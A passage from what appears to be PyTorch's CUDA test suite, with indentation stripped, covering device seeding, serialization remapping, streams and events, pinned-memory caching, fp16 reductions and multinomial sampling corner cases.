x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
def test_torch_manual_seed_seeds_cuda_devices(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
torch.manual_seed(2)
y = x.clone().uniform_()
self.assertEqual(x, y)
self.assertEqual(torch.cuda.initial_seed(), 2)
def test_manual_seed(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.cuda.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
a = torch.bernoulli(torch.full_like(x, 0.5))
torch.cuda.manual_seed(2)
y = x.clone().uniform_()
b = torch.bernoulli(torch.full_like(x, 0.5))
self.assertEqual(x, y)
self.assertEqual(a, b)
self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
@unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
def test_load_nonexistent_device(self):
# Setup: create a serialized file object with a 'cuda:9' restore location
tensor = torch.randn(2, device='cuda')
buf = io.BytesIO()
torch.save(tensor, buf)
# NB: this might not work in the future if serialization changes
buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
msg = r'Attempting to deserialize object on CUDA device 9'
with self.assertRaisesRegex(RuntimeError, msg):
_ = torch.load(buf)
def test_specify_improper_device_name(self):
import os
fname = "tempfile.pt"
try:
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
_use_new_zipfile_serialization=True)
torch.load(fname, 'cuda0')
finally:
if os.path.exists(fname):
os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
def gpu_remap(storage, location):
if location == 'cuda:1':
return storage.cuda(0)
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location=gpu_remap)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_cuda_set_device(self):
x = torch.randn(5, 5)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
torch.cuda.set_device(0)
self.assertEqual(x.cuda().get_device(), 0)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
self.assertEqual(x.cuda().get_device(), 0)
torch.cuda.set_device(1)
self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_current_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(device=1)
s2 = torch.cuda.current_stream(device=0)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s2)
with torch.cuda.device(d1):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(1)
s2 = torch.cuda.current_stream(d0)
self.assertEqual(d1, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.current_stream(torch.device('cpu'))
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipCUDANonDefaultStreamIf(True)
def test_default_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.default_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.default_stream()
s2 = torch.cuda.default_stream(device=0)
s3 = torch.cuda.default_stream(d1)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(d1, s3.device)
self.assertEqual(s0, s2)
self.assertEqual(s1, s3)
with torch.cuda.device(d0):
self.assertEqual(torch.cuda.current_stream(), s0)
with torch.cuda.device(d1):
self.assertEqual(torch.cuda.current_stream(), s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_context(self):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream(device=1)
s2 = torch.cuda.Stream(device=0)
with torch.cuda.device(s1.device):
prev_stream_on_cuda1 = torch.cuda.current_stream()
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s1):
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.stream(s2):
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s0):
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.device(s1.device):
self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
# deliberately using a different device
with torch.cuda.device(d0):
s1.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
@staticmethod
def _stream_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
e_tok.record(s)
s.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
s.record_event(e_tok)
e_tok.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_wait(self, spin_time_cycles):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream()
e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
e_tik.record(s0)
torch.cuda._sleep(spin_time_cycles - 10)
e_sync = torch.cuda.Event(blocking=True)
e_sync.record()
e_sync.wait(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10)
s1.synchronize()
e_tok.record()
e_tok.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
self.assertTrue(e_sync.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _test_stream_event_nogil(self, sync_func, p2c, c2p):
with torch.cuda.device('cuda:1'):
c2p.put(0)
p2c.get()
c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_nogil(self):
for sync_func in [TestCuda._stream_synchronize,
TestCuda._event_synchronize,
TestCuda._event_wait]:
p2c = queue.Queue()
c2p = queue.Queue()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
t = threading.Thread(
target=TestCuda._test_stream_event_nogil,
args=(self, sync_func, p2c, c2p))
t.daemon = True
t.start()
c2p.get()
with torch.cuda.device('cuda:0'):
e_tik.record()
p2c.put(0)
parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
child_time = c2p.get()
e_tok.record()
e_tok.synchronize()
total_time = e_tik.elapsed_time(e_tok)
# Without GIL, synchronizations in parent and child threads can
# overlap. The total execution time should be a little bit longer
# than spinning fifty million cycles and much shorter than twice of
# that. However, testing absolute execution time is not reliable as
# it may vary on different hardware in different environments.
# Therefore, this test uses relative comparisons, checking if the
# sum of parent and child threads execution time is greater than the
# real execution time by least 40%.
self.assertGreater(parent_time + child_time, total_time * 1.4)
# This test is flaky for ROCm, see issue #62602
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e0 = torch.cuda.Event()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
self.assertFalse(s0.query())
self.assertTrue(s1.query())
s1.wait_event(e0)
s1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = s0.record_event()
s0.synchronize()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e1 = s1.record_event()
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
# deliberately using a different device
with torch.cuda.device(d0):
e1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(10)
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
e1 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s1.record_event(e1)
e0.synchronize()
e1.synchronize()
with torch.cuda.device(d0):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d1):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e2 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s0.record_event(e2)
s0.synchronize()
self.assertGreater(e0.elapsed_time(e2), 0)
# deliberately calling from a different device
with torch.cuda.device(d1):
self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
result = torch.cuda.FloatTensor(t.size())
stream = torch.cuda.Stream()
ptr = [None]
# Performs the CPU->GPU copy in a background stream
def perform_copy():
with torch.cuda.stream(stream):
tmp = t.cuda(non_blocking=True)
ptr[0] = tmp.data_ptr()
torch.cuda.current_stream().wait_stream(stream)
tmp.record_stream(torch.cuda.current_stream())
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
result.copy_(tmp)
perform_copy()
with torch.cuda.stream(stream):
tmp2 = torch.cuda.FloatTensor(t.size())
tmp2.zero_()
self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used to soon')
self.assertEqual(result.tolist(), [1, 2, 3, 4])
# Check that the block will be re-used after the main stream finishes
torch.cuda.current_stream().synchronize()
with torch.cuda.stream(stream):
tmp3 = torch.cuda.FloatTensor(t.size())
self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
def test_record_stream_on_shifted_view(self):
# See issue #27366
# This test detects unexpected block reallocation. For reliable test,
# the stream to allocate tensors is isolated. The allocator will not
# reuse free blocks which were allocated from another stream.
stream_alloc = torch.cuda.Stream()
with torch.cuda.stream(stream_alloc):
base = torch.cuda.FloatTensor([10, 10])
# Record another stream on a shifted view tensor.
view = base[5:]
assert view.storage_offset() > 0
stream_record = torch.cuda.Stream()
with torch.cuda.stream(stream_record):
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
view.record_stream(stream_record)
# Delete those tensors to make the block free soon.
data_ptr = base.data_ptr()
del base, view
# A new tensor should not be allocated to the block above.
stream_alloc.synchronize()
with torch.cuda.stream(stream_alloc):
try_realloc = torch.cuda.FloatTensor([10, 10])
self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
@contextlib.contextmanager
def _get_external_stream(self, device):
cudart = torch.cuda.cudart()
stream = ctypes.c_ulonglong(0)
stream_p = ctypes.POINTER(ctypes.c_void_p)(stream)
stream_p_int = ctypes.cast(stream_p, ctypes.c_void_p).value
with device:
try:
out = cudart.cudaStreamCreate(stream_p_int)
self.assertEqual(out, 0)
self.assertNotEqual(stream.value, 0)
yield stream.value
finally:
out = cudart.cudaStreamDestroy(stream.value)
self.assertEqual(out, 0)
@skipIfRocm
def test_external_streams(self):
device = torch.cuda.device(0)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(stream_v)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_external_streams_multi_device(self):
device = torch.cuda.device(1)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(
stream_v, device=device)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
def test_noncontiguous_pinned_memory(self):
# See issue #3266
x = torch.arange(0, 10).view((2, 5))
self.assertEqual(x.t(), x.t().pin_memory())
def test_caching_pinned_memory(self):
cycles_per_ms = get_cycles_per_ms()
# check that allocations are re-used after deletion
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')
# check that the allocation is not re-used if it's in-use by a copy
gpu_tensor = torch.cuda.FloatTensor([0])
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
self.assertEqual(list(gpu_tensor), [1])
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
# checks that the events preventing pinned memory from being re-used
# too early are recorded on the correct GPU
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)
with torch.cuda.device(1):
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor1.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([2]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
with torch.cuda.device(0):
gpu_tensor0.copy_(t, non_blocking=True)
self.assertEqual(gpu_tensor1[0], 1)
self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
"""allocations delayed by a record_stream call should still be freed on
an out-of-memory in cuda_malloc_retry. see issue #19219"""
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
y = torch.zeros(40 * 1024 * 1024, device='cuda')
for _ in range(100):
x = torch.empty(40 * 1024 * 1024, device='cuda')
with torch.cuda.stream(stream):
y += x
# delays re-use of `x` until after all operations in `stream`
x.record_stream(stream)
del x
# we've made a mess by allocating up to the device capacity. free any
# cached blocks in case it affects future tests.
torch.cuda.empty_cache()
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
x = torch.ones(512, 8, dtype=torch.float32, device='cuda')
torch.sum(x, 0)
def test_sum_fp16(self):
x = torch.zeros(10, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 0)
x = torch.ones(65504, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 65504)
self.assertEqual(x.sum(dtype=torch.float32), 65504)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(dtype=torch.float32), 65536)
a = torch.zeros(1203611).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum().item(), a.sum().item())
a = torch.zeros(100, 121, 80).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2)))
def test_mean_fp16(self):
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(), 1)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(dtype=torch.float32), 1)
def test_prod_large(self):
# tests global reduction (should_global_reduce = true) in case of non-zero identity element
x = torch.ones(240000, device='cuda', dtype=torch.float32)
self.assertEqual(x.prod(), 1)
# test for complex types. Note 240k is divisible by 4
for dtype in [torch.cfloat, torch.cdouble]:
x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j)
self.assertEqual(x.prod(), 1)
def test_multinomial_ext(self):
# Test two corner cases from older PyTorch (Issue #4858)
freqs = torch.cuda.FloatTensor([
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
0.00020504408166743815, 0.00012302644609007984, 0.0,
0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0])
torch.cuda.manual_seed(11042)
sample = torch.multinomial(freqs, 1000, True)
self.assertNotEqual(freqs[sample].min(), 0)
p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
p[:, 1] = 1
torch.cuda.manual_seed(5214)
r = torch.multinomial(p, 1)
self.assertNotEqual(r.min().item(), 0)
# test corner case from Issue #13867
torch.cuda.manual_seed(33)
probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
samples = probs.multinomial(1000000, replacement=True)
self.assertGreater(probs[samples].min().item(), 0)
def _spawn_test_multinomial_invalid_probs_cuda(self, probs):
import subprocess
try:
p = subprocess.Popen([sys.executable, '-c', f"""\
import sys
import torch
from torch._six import inf, nan
try:
with torch.random.fork_rng(devices=[0]):
torch.multinomial(torch.tensor({probs}).to('cuda'), 2, replacement=True)
torch.cuda.synchronize()
sys.exit(-1) # Should not be reached
except RuntimeError as e:
sys.exit(-2)
"""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate(timeout=10)
p.wait(timeout=10)
except subprocess.TimeoutExpired as e:
p.kill()
out, err = p.communicate()
expected_messages = [
'device-side assert triggered', # CUDA
'Assertion', # CUDA
'HSA_STATUS_ERROR_EXCEPTION', # ROCm
'Device-side assertion' # ROCm
]
self.assertTrue(any([msg in out or msg in err for msg in expected_messages]))
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_multinomial_invalid_probs_cuda(self):
self._spawn_test_multinomial_invalid_probs_cuda([1., -1., 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., -inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., 1., nan])
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
idx = torch.randperm(src.shape[0], device='cuda')
res = src[idx]
res_cpu = src.cpu()[idx.cpu()]
self.assertEqual(res.cpu(), res_cpu)
def test_tensor_gather(self):
AbstractTestCases._TestTorchMixin._test_gather(self, lambda t: t.cuda(), False)
def test_tensor_scatter(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_', test_bounds=False)
def test_tensor_scatterAdd(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_add_', test_bounds=False)
def test_scatter_add_mult_index_base(self):
AbstractTestCases._TestTorchMixin._test_scatter_add_mult_index_base(self, lambda t: t.cuda())
def test_tensor_scatterFill(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False)
def test_tensor_scatter_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', test_bounds=False, test_complex=True)
def test_tensor_scatterAdd_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_add_', test_bounds=False, test_complex=True)
def test_tensor_scatterFill_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False, test_complex=True)
def test_min_max_inits(self):
# Testing if THC_reduceAll received the correct index initialization.
# This affects the result of THC_reduceAll operations at extreme values
x = torch.cuda.ByteTensor([0])
y = torch.cuda.ByteTensor([255])
expected = torch.cuda.LongTensor([0])[0]
_, v = x.max(dim=0)
self.assertEqual(v, expected)
_, v = y.min(dim=0)
